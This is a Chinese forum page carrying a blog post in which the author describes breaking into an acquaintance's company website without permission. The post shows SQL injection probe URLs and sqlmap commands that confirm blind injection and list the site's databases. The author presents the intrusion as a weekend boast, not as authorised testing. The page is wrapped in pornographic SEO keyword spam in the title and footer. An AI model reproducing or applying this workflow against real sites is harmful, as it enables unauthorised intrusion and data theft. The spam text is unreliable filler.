在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

您好,歡迎來電子發燒友網! ,新用戶?[免費注冊]

您的位置:電子發燒友網>源碼下載>數值算法/人工智能>

SQL工具注入攻破這家互聯網公司

大小:0.5 MB 人氣: 2017-10-11 需要積分:1
最近在研究Web安全相關的知識,特別是SQL注入類的相關知識。接觸了一些與SQL注入相關的工具。周末在家閑著無聊,想把平時學的東東結合起來攻擊一下身邊某個小伙伴去的公司,看看能不能得逞。不試不知道,一試還真TM得逞了,內心有些小激動,特在此寫博文一篇,來記錄下我是如何一步步攻破這家互聯網公司的。
  【作案工具介紹】
  (1) AppScan滲透掃描工具
  Appscan是Web應用程序滲透測試舞臺上使用最廣泛的工具之一。它是一個桌面應用程序,它有助于專業安全人員進行Web應用程序自動化脆弱性評估。
  (2) Sqlmap滲透測試工具
  Sqlmap是一個自動化的SQL注入工具,其主要功能是掃描,發現并利用給定的URL的SQL注入漏洞。
  【作案細節如下】
  首先使用Appscan工具,對www.xxx.com互聯網公司的官網進行掃描,掃描結果如下:
  SQL工具注入攻破這家互聯網公司
  在這56個安全性問題中,找到你感興趣的鏈接,例如下面這條:
  http://www.xxx.com/system/cms/show?id=1
  為何要挑出這一條呢?因為它對于SQL注入比較典型,下面普及下SQL注入常用手法。首先用如下語句,確定該網站是否存在注入點:
  http://192.168.16.128/news.php?id=1原網站
  http://192.168.16.128/news.php?id=1’ 出錯或顯示不正常
  http://192.168.16.128/news.php?id=1and 1=1 出錯或顯示不正常
  http://192.168.16.128/news.php?id=1and 1=2 出錯或顯示不正常
  如果有出錯,說明存在注入點。
  在判斷完http://www.xxx.com/system/cms/show?id=1該鏈接存在注入點后,接下來就啟動我們的滲透測試工具Sqlmap,進行下一步的注入工作,詳細過程如下:
  1) 再次確認目標注入點是否可用:
  python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1
  參數
  -u:指定注入點url
  結果:
  SQL工具注入攻破這家互聯網公司
  注入結果展示:
  a. 參數id存在基于布爾的盲注,即可以根據返回頁面判斷條件真假的注入。
  b. 參數id存在基于時間的盲注,即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增加)來判斷。
  c. 數據庫類型為:MySql 5.0.12
  2) 暴庫所有數據庫:
  一條命令即可曝出該sqlserver中所有數據庫名稱,命令如下:
  python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1–dbs
  參數:
  –dbs:dbs前面有兩條杠,列出所有數據庫。

非常好我支持^.^

(0) 0%

不好我反對

(0) 0%

      發表評論

      用戶評論
      評價:好評中評差評

      發表評論,獲取積分! 請遵守相關規定!

      ?
      主站蜘蛛池模板: 色老成人精品视频在线观看 | 手机在线一区二区三区 | 国产精品虐乳在线播放 | 2023天天操| 日韩种子 | 亚洲人成伊人成综合网久久 | 国产成人精品日本亚洲直接 | 欧洲亚洲一区 | 日本人69xxx 日本人69xxxxx | 嫩草影院久久国产精品 | h黄视频在线观看 | 99亚洲精品卡2卡三卡4卡2卡 | 在线免费色视频 | 躁天天躁中文字幕在线 | 午夜宅男视频 | 性欧美巨大 | 夜夜狠狠操 | 禁h粗大太大好爽好涨受不了了 | 久久国模 | 222网站高清免费观看 | 69久久夜色精品国产69小说 | 日韩乱轮 | 天天干夜夜玩 | 午夜黄| 欧美色天使 | 狠狠色噜噜狠狠狠狠97不卡 | 国产片无遮挡在线看床戏 | 国产香蕉久久精品综合网 | 成人精品视频在线观看播放 | 亚洲国产一区二区在线 | 污污的黄色小说 | 国产理论在线 | 日本天堂影院 | 五月天婷婷在线视频国产在线 | 在线理论视频 | 一级特黄aaa大片在线观看 | 一级女人毛片人一女人 | 国产高清成人 | 久久看免费视频 | 色视频免费观看 | 黄色爽视频 |